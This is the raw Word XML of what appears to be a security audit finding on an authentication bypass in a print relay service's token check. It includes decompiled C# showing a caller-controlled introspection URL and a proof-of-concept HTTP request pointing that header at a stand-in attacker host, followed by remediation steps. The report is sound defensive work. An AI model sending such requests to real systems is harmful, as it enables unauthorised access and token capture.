    <w:p w14:paraId="2C74B14C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C27D57"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274F2615" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274C54E" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PrintController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1F45C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>isUserTokenValid()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC86202" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>providerValidationUrl  (the "okta" substring check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564D8D7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>HTTP Request Header: X-ProviderValidationUrl (attacker-supplied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFA273" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667D04C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if (providerValidationUrl.IndexOf("okta", 5) &lt; 0) return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AEC820" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37406FA2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private bool isUserTokenValid(string providerValidationUrl, string accessToken, string clientSecretJwt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // VULNERABLE: Only substring check for "okta"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (providerValidationUrl.IndexOf("okta", 5) &lt; 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return false;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    var client = new HttpClient();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    client.BaseAddress = new Uri(uri.Scheme + "://" + uri.Host);  // host from header!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // ... POSTs token to attacker-supplied URL ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    var introspect = JsonConvert.DeserializeObject&lt;OktaIntrospectResponse&gt;(body);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // VULNERABLE: Never checks "active" claim!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return string.IsNullOrEmpty(introspect.ErrorCode);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0764EE" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="3CB7D873" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconstructed logic of PrintController.isUserTokenValid (decompiled from IL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F79362" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE0E1C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C04119" wp14:editId="448E1879">
            <wp:extent cx="5943600" cy="410648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xec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4106487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D03D96" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure F1 — Attack path: the attacker supplies their own token-checking address; the service only looks for the word "okta" and treats an empty reply as success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD76F3F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="26D38FDE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D42F22B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// providerValidationUrl, accessToken, clientSecretJwt all come straight from request headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C513024" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (providerValidationUrl.IndexOf("okta", 5) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0AAB9" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return false;                       // ONLY guard on the URL: must contain "okta"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31924649" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F3882" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var client = new HttpClient();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E47B2D6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>client.BaseAddress = new Uri(uri.Scheme + "://" + uri.Host);   // host taken from the header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA48CE4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var req = new HttpRequestMessage(HttpMethod.Post, path);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BDD5CE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>req.Content = new FormUrlEncodedContent(new</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[]{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5BC0048B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"token", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>accessToken},</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="707B37FD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"token_type_hint", "access_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>token"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421FC98A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"client_assertion", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>clientSecretJwt},</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58838ADF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"client_assertion_type", "urn:ietf:params:oauth:client-assertion-type:jwt-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bearer"} }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497381C0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var resp = await client.SendAsync(req);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F457C70" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var body = await resp.Content.ReadAsStringAsync();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3BEC9" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var introspect = JsonConvert.DeserializeObject&lt;OktaIntrospectResponse&gt;(body);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B06A8" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return string.IsNullOrEmpty(introspect.ErrorCode);   // VALID if no error field; never checks active==true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BB0226" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664E183C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof-of-concept request (any token value is accepted when the attacker server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>returns {} )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04AAFC" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172062B0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>POST /printers/print/pdfWithCopies HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076A4F2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host: 127.0.0.1:&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2BBCA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B3974" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-ProviderValidationUrl: https://okta.attacker.example/introspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A807C3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-AccessToken: anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E778A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-ClientSecretJwt: anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557CCFB5" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-Document-Name: poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30394638" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047A8AA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{ "Base64Content": "&lt;base64 PDF&gt;", "PrintDocType": "&lt;mapped doc type&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E3ED2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  "PrinterSettings</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>": {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Copies": 1 } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5CFFEA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D29722" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCFF78" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: make token validation depend only on server-side trust, never on caller-supplied input. Apply steps in order; each builds on the last.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE16BD8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Move the validation endpoint to server-side configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F321B9" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Add the Okta tenant and introspection/JWKS endpoints to appsettings.json (or environment variables) so they are fixed at deploy time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E61918B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Delete the code that reads the destination from the X-ProviderValidationUrl request header.</w:t>
      </w:r>
    </w:p>
